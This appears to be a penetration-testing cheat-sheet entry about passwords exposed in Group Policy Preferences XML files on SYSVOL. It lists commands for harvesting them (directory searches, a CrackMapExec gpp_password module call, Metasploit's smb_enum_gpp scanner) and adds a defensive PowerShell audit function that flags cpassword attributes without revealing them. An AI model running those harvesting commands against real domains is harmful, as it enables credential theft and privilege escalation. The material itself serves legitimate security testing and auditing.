# Group Policy Preferences

Unsecured credentials in Group Policy Preferences (GPP) can be an easy way to obtain credentials and escalate privileges. GPPs are stored as XML files in SYSVOL on domain controllers. The real kicker is that any domain user can read the SYSVOL share, obtain the stored password, and decrypt it within seconds.

```powershell
# Enumerating the credentials directory on the SYSVOL share (cmd.exe syntax, run from inside the share)
dir /s *.xml

# Enumerating credentials remotely from SYSVOL (cmd.exe syntax)
dir /s \\[FQDN]\SYSVOL\[FQDN]\ | more

# Enumerating credentials remotely using CrackMapExec
crackmapexec smb $ip -u $username -p $password -M gpp_password

# Enumerating credentials remotely using Metasploit
use auxiliary/scanner/smb/smb_enum_gpp
set rhosts $ip
set SMBUser $username
set SMBPass $password
run
```
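The same enumeration works as a defender's audit: the added example below (not part of the original page) walks a SYSVOL tree and reports every GPP XML element that still carries a non-empty `cpassword` attribute, without printing or decrypting the value, so the affected preference items can be removed and the accounts rotated. `Find-GppCpassword` is a hypothetical function name, and the sample file is a constructed, simplified `Groups.xml` with a placeholder value.

```powershell
# Added example (not from the original page). Find-GppCpassword is a hypothetical name.
function Find-GppCpassword {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Path)   # e.g. \\[FQDN]\SYSVOL\[FQDN]\Policies

    Get-ChildItem -Path $Path -Recurse -Filter *.xml -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            try {
                $doc = [xml](Get-Content -LiteralPath $file.FullName -Raw -ErrorAction Stop)
            } catch {
                Write-Warning "Skipping unreadable or malformed XML: $($file.FullName)"
                return
            }
            # Any element carrying a non-empty cpassword attribute, whatever the preference type
            foreach ($node in $doc.SelectNodes('//*[string-length(@cpassword) > 0]')) {
                # The account attribute name differs per preference type; -in compares case-insensitively
                $acct = $node.Attributes |
                    Where-Object { $_.LocalName -in 'userName', 'runAs', 'accountName' } |
                    Select-Object -First 1
                [pscustomobject]@{
                    File    = $file.FullName
                    Element = $node.ParentNode.LocalName
                    Account = if ($acct) { $acct.Value } else { '' }
                    Changed = $node.ParentNode.GetAttribute('changed')
                }   # the cpassword value itself is deliberately not emitted
            }
        }
}

# Constructed sample: a simplified Groups.xml-style file with a placeholder cpassword value
$demo = Join-Path ([IO.Path]::GetTempPath()) 'gpp-audit-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
@'
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc_example" changed="2014-01-01 00:00:00">
    <Properties action="U" userName="svc_example" cpassword="CONSTRUCTED-PLACEHOLDER" />
  </User>
</Groups>
'@ | Set-Content -LiteralPath (Join-Path $demo 'Groups.xml') -Encoding UTF8

Find-GppCpassword -Path $demo | Format-List
Remove-Item -LiteralPath $demo -Recurse -Force
```

Against a real domain, pass the `Policies` folder under SYSVOL as `-Path`; an empty result means no preference item in that tree stores a password.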


